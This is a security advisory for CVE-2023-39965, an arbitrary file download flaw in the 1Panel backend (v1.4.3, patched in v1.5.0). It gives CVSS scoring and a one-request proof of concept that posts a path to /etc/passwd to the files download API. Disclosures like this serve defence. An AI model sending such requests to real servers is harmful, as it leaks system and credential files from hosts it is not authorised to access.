Skip to content

1Panel Unauthorized access in Backend

Moderate
wanghe-fit2cloud published GHSA-85cf-gj29-f555 Aug 10, 2023

Package

No package listed

Affected versions

v1.4.3

Patched versions

v1.5.0

Description

Summary

Any file downloading vulnerability exists in 1Panel backend.

Details

Authenticated attackers can download arbitrary files through the API interface. This code has unauthorized access.
image

PoC

payload:

POST /api/v1/files/download/bypath HTTP/1.1
Host: ip
Content-Type: application/json

{"path":"/etc/passwd"}

f77959349e96543436eea18283fa75c

Impact

Attackers can freely download the file content on the target system. This will be caused a large amount of information leakage.

Severity

Moderate
6.5
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
Low
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

CVE ID

CVE-2023-39965

Weaknesses

No CWEs

Credits